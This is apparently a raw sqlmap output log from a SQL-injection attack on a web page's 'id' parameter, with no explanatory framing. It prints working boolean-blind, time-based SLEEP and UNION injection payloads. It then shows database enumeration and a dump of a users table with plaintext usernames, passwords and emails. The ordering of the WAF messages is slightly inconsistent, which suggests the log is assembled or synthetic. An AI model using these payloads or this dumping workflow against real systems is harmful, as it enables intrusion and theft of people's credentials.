        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.7.2#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[*] starting @ 10:30:00 /2026-04-25/

URL: http://example.local/search.php?id=1
[10:30:01] [INFO] testing connection to the target URL
[10:30:01] [WARNING] the target is protected by some kind of WAF/IPS
[10:30:01] [WARNING] WAF/IPS identified as 'ModSecurity'
[10:30:02] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:30:02] [INFO] testing if the target URL content is stable
[10:30:03] [INFO] GET parameter 'id' appears to be dynamic
[10:30:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable

sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1=1--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 to 20 columns
    Payload: id=NULL UNION ALL SELECT NULL,NULL,CONCAT(0x71,version(),0x71)--
---
[10:30:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 8.1.2, Apache 2.4.52
back-end DBMS: MySQL >= 5.0.12

[10:30:46] [INFO] fetching database names
available databases [2 entries]:
[*] information_schema
[*] webapp_db

Database: webapp_db
[2 tables]
+----------+
| users    |
| products |
+----------+

Table: users
[2 entries]
+----------+----------+------------------+
| username | password | email            |
+----------+----------+------------------+
| admin    | s3cr3t1! | admin@example.lo |
| jsmith   | pass123  | j@example.local  |
+----------+----------+------------------+

[*] ending @ 10:31:10 /2026-04-25/
